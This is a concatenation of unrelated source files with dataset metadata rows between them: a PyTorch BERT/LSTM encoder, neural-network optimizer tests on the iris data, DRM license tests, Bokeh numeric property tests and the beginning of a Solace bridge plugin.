forward_outputs = None
backward_state = None
backward_outputs = None
cell_memories = []
hidden_states = []
if self.use_bert:
input_ids = torch.tensor([self.bert_tokenizer.encode(sequence, add_special_tokens=True)],device=torch.device("cuda" if torch.cuda.is_available() else "cpu"))
last_hidden = None
with torch.no_grad():
# create a list of tensor embedding corresponding to words in sequence
last_hidden = self.bert_model(input_ids)[0]
# print(last_hidden[:,0,:].size())
last_hidden = self.l1(last_hidden)
last_hidden = [last_hidden[:,i,:].squeeze() for i in range(last_hidden.size()[1])] # size [batch=1, q_len, hidden ]
forward_state, forward_outputs = encode_sequence_bert(
last_hidden,
self.forward_lstms,
dropout_amount=dropout_amount)
# print(forward_state[0][0].size(),forward_state[1][0].size())
backward_state, backward_outputs = encode_sequence_bert(
last_hidden[::-1],
self.backward_lstms,
dropout_amount=dropout_amount)
# cell_memories = []
# hidden_states = []
for i in range(self.num_layers):
cell_memories.append(torch.cat([forward_state[0][i], backward_state[0][i]], dim=0))
hidden_states.append(torch.cat([forward_state[1][i], backward_state[1][i]], dim=0))
assert len(forward_outputs) == len(backward_outputs)
else:
forward_state, forward_outputs = encode_sequence(
sequence,
self.forward_lstms,
embedder,
dropout_amount=dropout_amount)
# print(forward_state[0][0].size(),forward_state[1][0].size())
backward_state, backward_outputs = encode_sequence(
sequence[::-1],
self.backward_lstms,
embedder,
dropout_amount=dropout_amount)
# cell_memories = []
# hidden_states = []
for i in range(self.num_layers):
cell_memories.append(torch.cat([forward_state[0][i], backward_state[0][i]], dim=0))
hidden_states.append(torch.cat([forward_state[1][i], backward_state[1][i]], dim=0))
assert len(forward_outputs) == len(backward_outputs)
backward_outputs = backward_outputs[::-1]
final_outputs = []
for i in range(len(sequence)):
final_outputs.append(torch.cat([forward_outputs[i], backward_outputs[i]], dim=0))
return (cell_memories, hidden_states), final_outputs
| 40.923588
| 169
| 0.621773
| 1,518
| 12,318
| 4.810277
| 0.092227
| 0.023829
| 0.037387
| 0.040263
| 0.886059
| 0.886059
| 0.886059
| 0.881265
| 0.881265
| 0.872501
| 0
| 0.010267
| 0.280484
| 12,318
| 301
| 170
| 40.923588
| 0.813607
| 0.283812
| 0
| 0.846667
| 0
| 0
| 0.011447
| 0
| 0
| 0
| 0
| 0.003322
| 0.033333
| 1
| 0.053333
| false
| 0
| 0.026667
| 0
| 0.133333
| 0.006667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82f80a1460641d518fb1f7c4b49a4396c7782072
| 8,483
|
py
|
Python
|
tests/test_iris_net.py
|
xausssr/nnreslib
|
2b3932df41369c329040603154418bb5512506b8
|
[
"MIT"
] | null | null | null |
tests/test_iris_net.py
|
xausssr/nnreslib
|
2b3932df41369c329040603154418bb5512506b8
|
[
"MIT"
] | 3
|
2021-07-25T20:40:44.000Z
|
2021-07-26T08:36:03.000Z
|
tests/test_iris_net.py
|
xausssr/nnreslib
|
2b3932df41369c329040603154418bb5512506b8
|
[
"MIT"
] | null | null | null |
# import matplotlib.pyplot as plt
# from nnreslib.utils.metrics import OpMode
import numpy as np
import tensorflow as tf
from nnreslib.architecture import ArchitectureType
from nnreslib.layers import FullyConnectedLayer, InputLayer
from nnreslib.model import Model
from nnreslib.utils.types import ActivationFunctions, Shape
def test_iris_net_lm():
tf.compat.v1.reset_default_graph()
np.random.seed(42)
data = np.load("./tests/data/iris.npy")
np.random.shuffle(data)
x_train = data[:150, :-1]
y_train = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
x_validation = data[:150, :-1]
y_validation = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
architecture: ArchitectureType = [
InputLayer("input", Shape(4)),
FullyConnectedLayer("fc_1", neurons=5),
FullyConnectedLayer("fc_2", neurons=6),
FullyConnectedLayer(
"fc_3",
neurons=3,
activation=ActivationFunctions.SOFTMAX,
is_out=True,
),
]
model = Model(150, architecture)
epoch, loss = model.train(
"LevenbergMarquardt",
x_train,
y_train,
x_validation,
y_validation,
200,
0.05,
step_into_epoch=10,
regularisation_factor_init=5.0,
regularisation_factor_decay=10.0,
regularisation_factor_increase=10.0,
percent_random=0.2,
)
assert epoch < 200
assert loss < 0.05
def test_iris_net_adam():
tf.compat.v1.reset_default_graph()
np.random.seed(42)
data = np.load("./tests/data/iris.npy")
np.random.shuffle(data)
x_train = data[:150, :-1]
y_train = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
x_validation = data[:150, :-1]
y_validation = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
architecture: ArchitectureType = [
InputLayer("input", Shape(4)),
FullyConnectedLayer("fc_1", neurons=5),
FullyConnectedLayer("fc_2", neurons=6),
FullyConnectedLayer(
"fc_3",
neurons=3,
activation=ActivationFunctions.SOFTMAX,
is_out=True,
),
]
model = Model(150, architecture)
epoch, loss = model.train(
"Adam", x_train, y_train, x_validation, y_validation, 200, 0.1, learning_rate=0.01, logging_step=10
)
assert epoch <= 200
assert loss < 0.1
def test_iris_net_adadelta():
tf.compat.v1.reset_default_graph()
np.random.seed(42)
data = np.load("./tests/data/iris.npy")
np.random.shuffle(data)
x_train = data[:150, :-1]
y_train = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
x_validation = data[:150, :-1]
y_validation = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
architecture: ArchitectureType = [
InputLayer("input", Shape(4)),
FullyConnectedLayer("fc_1", neurons=5),
FullyConnectedLayer("fc_2", neurons=6),
FullyConnectedLayer(
"fc_3",
neurons=3,
activation=ActivationFunctions.SOFTMAX,
is_out=True,
),
]
model = Model(150, architecture)
epoch, loss = model.train(
"Adadelta",
x_train,
y_train,
x_validation,
y_validation,
200,
0.1,
learning_rate=30.0,
logging_step=10,
)
assert epoch <= 200
assert loss < 0.1
def test_iris_net_adagrad():
tf.compat.v1.reset_default_graph()
np.random.seed(42)
data = np.load("./tests/data/iris.npy")
np.random.shuffle(data)
x_train = data[:150, :-1]
y_train = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
x_validation = data[:150, :-1]
y_validation = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
architecture: ArchitectureType = [
InputLayer("input", Shape(4)),
FullyConnectedLayer("fc_1", neurons=5),
FullyConnectedLayer("fc_2", neurons=6),
FullyConnectedLayer(
"fc_3",
neurons=3,
activation=ActivationFunctions.SOFTMAX,
is_out=True,
),
]
model = Model(150, architecture)
epoch, loss = model.train(
"Adagrad",
x_train,
y_train,
x_validation,
y_validation,
200,
0.1,
learning_rate=1.0,
logging_step=10,
)
assert epoch <= 200
assert loss < 0.1
def test_iris_net_rmsprop():
tf.compat.v1.reset_default_graph()
np.random.seed(42)
data = np.load("./tests/data/iris.npy")
np.random.shuffle(data)
x_train = data[:150, :-1]
y_train = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
x_validation = data[:150, :-1]
y_validation = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
architecture: ArchitectureType = [
InputLayer("input", Shape(4)),
FullyConnectedLayer("fc_1", neurons=5),
FullyConnectedLayer("fc_2", neurons=6),
FullyConnectedLayer(
"fc_3",
neurons=3,
activation=ActivationFunctions.SOFTMAX,
is_out=True,
),
]
model = Model(150, architecture)
epoch, loss = model.train(
"RMSProp",
x_train,
y_train,
x_validation,
y_validation,
200,
0.1,
learning_rate=0.1,
logging_step=10,
)
assert epoch <= 200
assert loss < 0.1
def test_iris_net_momentum():
tf.compat.v1.reset_default_graph()
np.random.seed(42)
data = np.load("./tests/data/iris.npy")
np.random.shuffle(data)
x_train = data[:150, :-1]
y_train = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
x_validation = data[:150, :-1]
y_validation = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
architecture: ArchitectureType = [
InputLayer("input", Shape(4)),
FullyConnectedLayer("fc_1", neurons=5),
FullyConnectedLayer("fc_2", neurons=6),
FullyConnectedLayer(
"fc_3",
neurons=3,
activation=ActivationFunctions.SOFTMAX,
is_out=True,
),
]
model = Model(150, architecture)
epoch, loss = model.train(
"Momentum",
x_train,
y_train,
x_validation,
y_validation,
200,
0.1,
learning_rate=5.0,
logging_step=10,
)
assert epoch <= 200
assert loss < 0.1
def test_iris_net_sgd():
tf.compat.v1.reset_default_graph()
np.random.seed(42)
data = np.load("./tests/data/iris.npy")
np.random.shuffle(data)
x_train = data[:150, :-1]
y_train = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
x_validation = data[:150, :-1]
y_validation = np.eye(3)[data[:150, -1].reshape((-1)).astype(int)].astype(np.float64)
architecture: ArchitectureType = [
InputLayer("input", Shape(4)),
FullyConnectedLayer("fc_1", neurons=5),
FullyConnectedLayer("fc_2", neurons=6),
FullyConnectedLayer(
"fc_3",
neurons=3,
activation=ActivationFunctions.SOFTMAX,
is_out=True,
),
]
model = Model(150, architecture)
epoch, loss = model.train(
"SGD",
x_train,
y_train,
x_validation,
y_validation,
200,
0.1,
learning_rate=5.0,
logging_step=10,
)
assert epoch <= 200
assert loss < 0.1
# assert np.array_equal(model.predict(x_train)[0], np.array([1, 0, 0]))
# Only for interactive testing
# plt.plot(model.metrics.results[OpMode.TRAIN]["MSE"], label="Train MSE")
# plt.plot(model.metrics.results[OpMode.TRAIN]["RMSE"], label="Train RMSE")
# plt.plot(model.metrics.results[OpMode.TRAIN]["MAE"], label="Train MAE")
# plt.plot(model.metrics.results[OpMode.TRAIN]["CCE"], label="Train CCE")
# plt.plot(model.metrics.results[OpMode.VALID]["MSE"], label="Valid MSE")
# plt.plot(model.metrics.results[OpMode.VALID]["RMSE"], label="Valid RMSE")
# plt.plot(model.metrics.results[OpMode.VALID]["MAE"], label="Valid MAE")
# plt.plot(model.metrics.results[OpMode.VALID]["CCE"], label="Train CCE")
# plt.legend()
# plt.show()
| 27.722222
| 107
| 0.595898
| 1,057
| 8,483
| 4.648061
| 0.103122
| 0.039894
| 0.045593
| 0.025646
| 0.85976
| 0.852636
| 0.847547
| 0.783228
| 0.783228
| 0.783228
| 0
| 0.058944
| 0.254037
| 8,483
| 305
| 108
| 27.813115
| 0.717446
| 0.091477
| 0
| 0.811715
| 0
| 0
| 0.041732
| 0.019111
| 0
| 0
| 0
| 0
| 0.058577
| 1
| 0.029289
| false
| 0
| 0.025105
| 0
| 0.054393
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d21a52c0f81c6235782ad5477881d6625a11c797
| 164
|
py
|
Python
|
instruction/field/__init__.py
|
HansGR/WorldsCollide
|
af227be553e120ee004b130598360c61daf7df59
|
[
"MIT"
] | 7
|
2022-01-15T02:53:53.000Z
|
2022-02-17T00:51:32.000Z
|
instruction/field/__init__.py
|
HansGR/WorldsCollide
|
af227be553e120ee004b130598360c61daf7df59
|
[
"MIT"
] | 8
|
2022-01-16T02:45:24.000Z
|
2022-03-21T02:08:27.000Z
|
instruction/field/__init__.py
|
HansGR/WorldsCollide
|
af227be553e120ee004b130598360c61daf7df59
|
[
"MIT"
] | 5
|
2022-01-15T02:53:38.000Z
|
2022-01-19T17:42:10.000Z
|
from instruction.field.instructions import *
from instruction.field.functions import *
from instruction.field.custom import *
from instruction.field.y_npc import *
| 32.8
| 44
| 0.829268
| 21
| 164
| 6.428571
| 0.428571
| 0.444444
| 0.592593
| 0.577778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097561
| 164
| 4
| 45
| 41
| 0.912162
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d22e5c4318ee7ef3799f51b440d0f169631ff64e
| 5,844
|
py
|
Python
|
tests/test_drm_license_error.py
|
Accelize/drm
|
081ef761de50b526523b692c3a8decf290714ed0
|
[
"Apache-2.0"
] | 4
|
2021-02-21T09:11:50.000Z
|
2021-11-29T02:34:07.000Z
|
tests/test_drm_license_error.py
|
Accelize/drm
|
081ef761de50b526523b692c3a8decf290714ed0
|
[
"Apache-2.0"
] | null | null | null |
tests/test_drm_license_error.py
|
Accelize/drm
|
081ef761de50b526523b692c3a8decf290714ed0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Test metering and floating behaviors of DRM Library.
"""
import pytest
from time import sleep
from random import randint
from datetime import datetime, timedelta
from re import search
from json import loads, dumps
from flask import request as _request
from requests import get, post
from tests.proxy import get_context, set_context
@pytest.mark.skip(reason='Waiting a fix from LGDN')
@pytest.mark.no_parallel
def test_header_error_on_key(accelize_drm, conf_json, cred_json, async_handler,
live_server, request):
"""
Test a MAC error is returned if the key value in the response has been modified
"""
driver = accelize_drm.pytest_fpga_driver[0]
# Program FPGA with lastest HDK per major number
image_id = driver.fpga_image
driver.program_fpga(image_id)
async_cb = async_handler.create()
async_cb.reset()
conf_json.reset()
conf_json['licensing']['url'] = _request.url + request.function.__name__
conf_json.save()
with accelize_drm.DrmManager(
conf_json.path, cred_json.path,
driver.read_register_callback,
driver.write_register_callback,
async_cb.callback
) as drm_manager:
# Set initial context on the live server
context = {'cnt':0}
set_context(context)
assert get_context() == context
# Check failure is detected
with pytest.raises(accelize_drm.exceptions.DRMCtlrError) as excinfo:
drm_manager.activate()
assert async_handler.get_error_code(str(excinfo.value)) == accelize_drm.exceptions.DRMCtlrError.error_code
assert "License header check error" in str(excinfo.value)
async_cb.assert_NoError()
@pytest.mark.no_parallel
def test_header_error_on_licenseTimer(accelize_drm, conf_json, cred_json, async_handler,
live_server, request):
"""
Test a MAC error is returned if the licenseTimer value in the response has been modified
"""
driver = accelize_drm.pytest_fpga_driver[0]
# Program FPGA with lastest HDK per major number
image_id = driver.fpga_image
driver.program_fpga(image_id)
async_cb = async_handler.create()
async_cb.reset()
activators = accelize_drm.pytest_fpga_activators[0]
activators.reset_coin()
activators.autotest()
conf_json.reset()
conf_json['licensing']['url'] = _request.url + request.function.__name__
conf_json.save()
with accelize_drm.DrmManager(
conf_json.path, cred_json.path,
driver.read_register_callback,
driver.write_register_callback,
async_cb.callback
) as drm_manager:
# Set initial context on the live server
context = {'cnt':0}
set_context(context)
assert get_context() == context
drm_manager.activate()
start = datetime.now()
lic_duration = drm_manager.get('license_duration')
assert drm_manager.get('license_status')
activators.autotest(is_activated=True)
wait_period = start + timedelta(seconds=lic_duration+2) - datetime.now()
sleep(wait_period.total_seconds())
assert not drm_manager.get('license_status')
activators.autotest(is_activated=False)
activators.autotest(is_activated=False)
assert async_cb.was_called
assert async_cb.message is not None
assert async_cb.errcode == accelize_drm.exceptions.DRMCtlrError.error_code
assert "License header check error" in async_cb.message
@pytest.mark.no_parallel
def test_session_id_error(accelize_drm, conf_json, cred_json, async_handler,
live_server, request):
"""
Test an error is returned if a wrong session id is provided
"""
driver = accelize_drm.pytest_fpga_driver[0]
async_cb = async_handler.create()
async_cb.reset()
activators = accelize_drm.pytest_fpga_activators[0]
activators.reset_coin()
activators.autotest()
conf_json.reset()
conf_json['licensing']['url'] = _request.url + request.function.__name__
conf_json.save()
with accelize_drm.DrmManager(
conf_json.path, cred_json.path,
driver.read_register_callback,
driver.write_register_callback,
async_cb.callback
) as drm_manager:
# Set initial context on the live server
context = {'session_id':'0', 'session_cnt':0, 'request_cnt':0}
set_context(context)
assert get_context() == context
# Start session #1 to record
drm_manager.activate()
start = datetime.now()
assert drm_manager.get('license_status')
activators.autotest(is_activated=True)
lic_duration = drm_manager.get('license_duration')
wait_period = start + timedelta(seconds=lic_duration+2) - datetime.now()
sleep(wait_period.total_seconds())
assert drm_manager.get('license_status')
drm_manager.deactivate()
assert not drm_manager.get('license_status')
activators.autotest(is_activated=False)
async_cb.assert_NoError()
# Start session #2 to replay session #1
drm_manager.activate()
start = datetime.now()
assert drm_manager.get('license_status')
activators.autotest(is_activated=True)
lic_duration = drm_manager.get('license_duration')
wait_period = start + timedelta(seconds=lic_duration+2) - datetime.now()
sleep(wait_period.total_seconds())
assert not drm_manager.get('license_status')
activators.autotest(is_activated=False)
drm_manager.deactivate()
assert async_cb.was_called
assert async_cb.message is not None
assert async_cb.errcode == accelize_drm.exceptions.DRMCtlrError.error_code
assert "License header check error" in async_cb.message
| 36.074074
| 114
| 0.691478
| 741
| 5,844
| 5.186235
| 0.190283
| 0.034608
| 0.033828
| 0.052043
| 0.811606
| 0.802758
| 0.78012
| 0.761124
| 0.761124
| 0.728858
| 0
| 0.003742
| 0.222621
| 5,844
| 161
| 115
| 36.298137
| 0.842175
| 0.103183
| 0
| 0.857143
| 0
| 0
| 0.062198
| 0
| 0
| 0
| 0
| 0
| 0.184874
| 1
| 0.02521
| false
| 0
| 0.07563
| 0
| 0.10084
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
96bc7368532d2026d8b8f9e150620f5478823fd8
| 9,241
|
py
|
Python
|
tests/unit/bokeh/core/property/test_numeric.py
|
jeisch/bokeh
|
6be4d5ebbec04117f2bb0693fe64dc664f8f1bb1
|
[
"BSD-3-Clause"
] | 1
|
2020-03-21T04:11:51.000Z
|
2020-03-21T04:11:51.000Z
|
tests/unit/bokeh/core/property/test_numeric.py
|
jeisch/bokeh
|
6be4d5ebbec04117f2bb0693fe64dc664f8f1bb1
|
[
"BSD-3-Clause"
] | 2
|
2021-05-08T11:43:21.000Z
|
2021-05-10T19:16:43.000Z
|
tests/unit/bokeh/core/property/test_numeric.py
|
jeisch/bokeh
|
6be4d5ebbec04117f2bb0693fe64dc664f8f1bb1
|
[
"BSD-3-Clause"
] | null | null | null |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
# Bokeh imports
from _util_property import _TestHasProps, _TestModel
from bokeh.core.properties import Float, Int
from bokeh._testing.util.api import verify_all
# Module under test
import bokeh.core.property.numeric as bcpn
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
ALL = (
'Angle',
'Byte',
'Interval',
'NonNegativeInt',
'Percent',
'PositiveInt',
'Size',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
class Test_Angle(object):
def test_valid(self):
prop = bcpn.Angle()
assert prop.is_valid(None)
# TODO (bev) should fail
assert prop.is_valid(False)
assert prop.is_valid(True)
assert prop.is_valid(0)
assert prop.is_valid(1)
assert prop.is_valid(0.0)
assert prop.is_valid(1.0)
def test_invalid(self):
prop = bcpn.Angle()
assert not prop.is_valid(1.0+1.0j)
assert not prop.is_valid("")
assert not prop.is_valid(())
assert not prop.is_valid([])
assert not prop.is_valid({})
assert not prop.is_valid(_TestHasProps())
assert not prop.is_valid(_TestModel())
def test_has_ref(self):
prop = bcpn.Angle()
assert not prop.has_ref
def test_str(self):
prop = bcpn.Angle()
assert str(prop) == "Angle"
class Test_Interval(object):
def test_init(self):
with pytest.raises(TypeError):
bcpn.Interval()
with pytest.raises(ValueError):
bcpn.Interval(Int, 0.0, 1.0)
def test_valid_int(self):
prop = bcpn.Interval(Int, 0, 255)
assert prop.is_valid(None)
# TODO (bev) should fail
assert prop.is_valid(False)
assert prop.is_valid(True)
assert prop.is_valid(0)
assert prop.is_valid(1)
assert prop.is_valid(127)
def test_invalid_int(self):
prop = bcpn.Interval(Int, 0, 255)
assert not prop.is_valid(0.0)
assert not prop.is_valid(1.0)
assert not prop.is_valid(1.0+1.0j)
assert not prop.is_valid("")
assert not prop.is_valid(())
assert not prop.is_valid([])
assert not prop.is_valid({})
assert not prop.is_valid(_TestHasProps())
assert not prop.is_valid(_TestModel())
assert not prop.is_valid(-1)
assert not prop.is_valid(256)
def test_valid_float(self):
prop = bcpn.Interval(Float, 0.0, 1.0)
assert prop.is_valid(None)
# TODO (bev) should fail
assert prop.is_valid(False)
assert prop.is_valid(True)
assert prop.is_valid(0)
assert prop.is_valid(1)
assert prop.is_valid(0.0)
assert prop.is_valid(1.0)
assert prop.is_valid(0.5)
def test_invalid_float(self):
prop = bcpn.Interval(Float, 0.0, 1.0)
assert not prop.is_valid(1.0+1.0j)
assert not prop.is_valid("")
assert not prop.is_valid(())
assert not prop.is_valid([])
assert not prop.is_valid({})
assert not prop.is_valid(_TestHasProps())
assert not prop.is_valid(_TestModel())
assert not prop.is_valid(-0.001)
assert not prop.is_valid( 1.001)
def test_has_ref(self):
prop = bcpn.Interval(Float, 0.0, 1.0)
assert not prop.has_ref
def test_str(self):
prop = bcpn.Interval(Float, 0.0, 1.0)
assert str(prop) == "Interval(Float, 0.0, 1.0)"
class Test_Size(object):
def test_valid(self):
prop = bcpn.Size()
assert prop.is_valid(None)
# TODO (bev) should fail
assert prop.is_valid(False)
assert prop.is_valid(True)
assert prop.is_valid(0)
assert prop.is_valid(1)
assert prop.is_valid(0.0)
assert prop.is_valid(1.0)
assert prop.is_valid(100)
assert prop.is_valid(100.1)
def test_invalid(self):
prop = bcpn.Size()
assert not prop.is_valid(1.0+1.0j)
assert not prop.is_valid("")
assert not prop.is_valid(())
assert not prop.is_valid([])
assert not prop.is_valid({})
assert not prop.is_valid(_TestHasProps())
assert not prop.is_valid(_TestModel())
assert not prop.is_valid(-100)
assert not prop.is_valid(-0.001)
def test_has_ref(self):
prop = bcpn.Size()
assert not prop.has_ref
def test_str(self):
prop = bcpn.Size()
assert str(prop) == "Size"
class Test_Percent(object):
def test_valid(self):
prop = bcpn.Percent()
assert prop.is_valid(None)
# TODO (bev) should fail
assert prop.is_valid(False)
assert prop.is_valid(True)
assert prop.is_valid(0)
assert prop.is_valid(1)
assert prop.is_valid(0.0)
assert prop.is_valid(1.0)
assert prop.is_valid(0.5)
def test_invalid(self):
prop = bcpn.Percent()
assert not prop.is_valid(1.0+1.0j)
assert not prop.is_valid("")
assert not prop.is_valid(())
assert not prop.is_valid([])
assert not prop.is_valid({})
assert not prop.is_valid(_TestHasProps())
assert not prop.is_valid(_TestModel())
assert not prop.is_valid(-0.001)
assert not prop.is_valid( 1.001)
def test_has_ref(self):
prop = bcpn.Percent()
assert not prop.has_ref
def test_str(self):
prop = bcpn.Percent()
assert str(prop) == "Percent"
class Test_NonNegativeInt(object):
def test_valid(self):
prop = bcpn.NonNegativeInt()
assert prop.is_valid(None)
# TODO (bev) should fail
assert prop.is_valid(False)
assert prop.is_valid(True)
assert prop.is_valid(0)
assert prop.is_valid(1)
assert prop.is_valid(2)
assert prop.is_valid(100)
def test_invalid(self):
prop = bcpn.NonNegativeInt()
assert not prop.is_valid(-1)
assert not prop.is_valid(0.0)
assert not prop.is_valid(1.0)
assert not prop.is_valid(1.0+1.0j)
assert not prop.is_valid("")
assert not prop.is_valid(())
assert not prop.is_valid([])
assert not prop.is_valid({})
assert not prop.is_valid(_TestHasProps())
assert not prop.is_valid(_TestModel())
assert not prop.is_valid(-100)
assert not prop.is_valid(-0.001)
def test_has_ref(self):
prop = bcpn.NonNegativeInt()
assert not prop.has_ref
def test_str(self):
prop = bcpn.NonNegativeInt()
assert str(prop) == "NonNegativeInt"
class Test_PositiveInt(object):
def test_valid(self):
prop = bcpn.PositiveInt()
assert prop.is_valid(None)
# TODO (bev) should fail
assert prop.is_valid(True)
assert prop.is_valid(1)
assert prop.is_valid(2)
assert prop.is_valid(100)
def test_invalid(self):
prop = bcpn.PositiveInt()
assert not prop.is_valid(False)
assert not prop.is_valid(-1)
assert not prop.is_valid(0)
assert not prop.is_valid(0.0)
assert not prop.is_valid(1.0)
assert not prop.is_valid(1.0+1.0j)
assert not prop.is_valid("")
assert not prop.is_valid(())
assert not prop.is_valid([])
assert not prop.is_valid({})
assert not prop.is_valid(_TestHasProps())
assert not prop.is_valid(_TestModel())
assert not prop.is_valid(-100)
assert not prop.is_valid(-0.001)
def test_has_ref(self):
prop = bcpn.PositiveInt()
assert not prop.has_ref
def test_str(self):
prop = bcpn.PositiveInt()
assert str(prop) == "PositiveInt"
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
Test___all__ = verify_all(bcpn, ALL)
| 27.834337
| 78
| 0.525592
| 1,133
| 9,241
| 4.113857
| 0.082083
| 0.155761
| 0.285561
| 0.228492
| 0.821927
| 0.790388
| 0.780734
| 0.715083
| 0.715083
| 0.701352
| 0
| 0.025057
| 0.244238
| 9,241
| 331
| 79
| 27.918429
| 0.642325
| 0.183422
| 0
| 0.805687
| 0
| 0
| 0.01585
| 0
| 0
| 0
| 0
| 0.003021
| 0.630332
| 1
| 0.127962
| false
| 0
| 0.023697
| 0
| 0.180095
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
738411cd5f30c3d6bc607ae9f0811f3682159406
| 245
|
py
|
Python
|
tools/templates/test/src/main/python/test6/modules.py
|
fanqingbo/smv
|
7fdcc63fee36a3a44562594a96e9e69bf9aa51b7
|
[
"Apache-2.0"
] | null | null | null |
tools/templates/test/src/main/python/test6/modules.py
|
fanqingbo/smv
|
7fdcc63fee36a3a44562594a96e9e69bf9aa51b7
|
[
"Apache-2.0"
] | null | null | null |
tools/templates/test/src/main/python/test6/modules.py
|
fanqingbo/smv
|
7fdcc63fee36a3a44562594a96e9e69bf9aa51b7
|
[
"Apache-2.0"
] | null | null | null |
from smv import *
class M2(SmvPyModule, SmvPyOutput):
def requiresDS(self):
return [ SmvPyExtDataSet("org.tresamigos.smvtest.test6.M1") ]
def run(self, i):
return i[ SmvPyExtDataSet("org.tresamigos.smvtest.test6.M1") ]
| 27.222222
| 70
| 0.681633
| 29
| 245
| 5.758621
| 0.655172
| 0.215569
| 0.335329
| 0.419162
| 0.502994
| 0.502994
| 0
| 0
| 0
| 0
| 0
| 0.025126
| 0.187755
| 245
| 8
| 71
| 30.625
| 0.81407
| 0
| 0
| 0
| 0
| 0
| 0.253061
| 0.253061
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
73f6430a598cf838e8116ea5f9abb6619ba107a8
| 21,226
|
py
|
Python
|
libsolace/items/SolaceBridge.py
|
ExalDraen/python-libsolace
|
76abd2ac8b9f2c579fa9c23ae0c988ce001fabaf
|
[
"MIT"
] | null | null | null |
libsolace/items/SolaceBridge.py
|
ExalDraen/python-libsolace
|
76abd2ac8b9f2c579fa9c23ae0c988ce001fabaf
|
[
"MIT"
] | null | null | null |
libsolace/items/SolaceBridge.py
|
ExalDraen/python-libsolace
|
76abd2ac8b9f2c579fa9c23ae0c988ce001fabaf
|
[
"MIT"
] | 2
|
2019-09-06T23:47:35.000Z
|
2020-09-14T10:06:07.000Z
|
import logging
import libsolace
from libsolace import Plugin
from libsolace.SolaceAPI import SolaceAPI
from libsolace.SolaceCommandQueue import SolaceCommandQueue
from libsolace.SolaceXMLBuilder import SolaceXMLBuilder
from libsolace.items.SolaceQueue import SolaceQueue
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
@libsolace.plugin_registry.register
class SolaceBridge(Plugin):
""" Construct a bridge between two appliance clusters to link specific VPN's. This Plugin is still being developed,
and is NOT ready for production. """
def __init__(self, testmode=True, shutdown_on_apply=False, options=None, version=None, **kwargs):
""" Init user object
:type testmode: boolean
:type shutdown_on_apply: boolean
:type options: OptionParser
:type version: string
"""
logger.debug("options: %s" % options)
self.cq = SolaceCommandQueue(version=version)
self.primaryCluster = SolaceAPI(options.primary, testmode=testmode, version=version)
self.drCluster = SolaceAPI(options.backup, testmode=testmode, version=version)
self.vpns = []
for vpn in options.vpns:
try:
